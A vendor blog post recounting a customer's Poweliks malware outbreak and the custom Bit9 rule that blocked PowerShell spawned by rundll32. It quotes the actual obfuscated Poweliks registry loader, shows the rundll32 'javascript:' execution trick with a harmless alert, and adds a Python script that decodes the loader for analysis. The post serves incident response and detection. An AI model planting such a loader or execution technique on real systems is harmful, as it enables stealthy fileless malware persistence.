
Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

January 21, 2015 / Editorial Staff

I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!
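As an added example (not part of the original post, and not the customer's or Bit9's tooling), the Python below reverses the one-code-point shift that hides the registry value quoted above and pulls out the registry path the loader reads its next stage from. It assumes only the encoded text exactly as the post shows it inside eval("...").

```python
import re

# The obfuscated text quoted in the post above (the argument to eval("...")).
# Every character was shifted up by one code point; the loader undoes this at
# runtime with String.fromCharCode(_.charCodeAt()-1), so we apply the same shift.
ENCODED = (
    "epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**"
    "/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]"
    "mpdbmtfswfs43]]b(*,(=0tdsjqu?(*"
)


def unshift(text: str, shift: int = 1) -> str:
    """Reverse a fixed code-point shift (this sample used a shift of 1)."""
    return "".join(chr(ord(c) - shift) for c in text)


def registry_paths(script: str) -> list:
    """Return the RegRead() targets in the decoded loader.

    The decoded JavaScript source spells path separators as doubled
    backslashes, so collapse them to the single backslash a registry tool wants.
    """
    paths = re.findall(r"RegRead\('([^']+)'\)", script)
    return [p.replace("\\\\", "\\") for p in paths]


def analyze(encoded: str) -> dict:
    """Decode the value and summarise the behaviours a defender cares about."""
    decoded = unshift(encoded)
    return {
        "decoded": decoded,
        # Where the real payload lives: a second registry value, not the Run key itself.
        "registry_paths": registry_paths(decoded),
        # A script engine pulling more code out of the registry is the tell.
        "reads_registry": "RegRead(" in decoded,
        "uses_wscript_shell": "WScript.Shell" in decoded,
    }


if __name__ == "__main__":
    result = analyze(ENCODED)
    print(result["decoded"])
    for path in result["registry_paths"]:
        print("next stage is read from:", path)
```

The decoded value is only a stub that fetches and executes a second registry value; that second location is the artifact to collect during cleanup, since reimaging only the visible Run entry leaves the question of where the rest of the payload sat unanswered.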

I wouldn’t have guessed that rundll32 would be able to execute JavaScript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('RaawwwrrrrRRrrr');


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:

[Screenshot of the custom Bit9 rule]

The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.
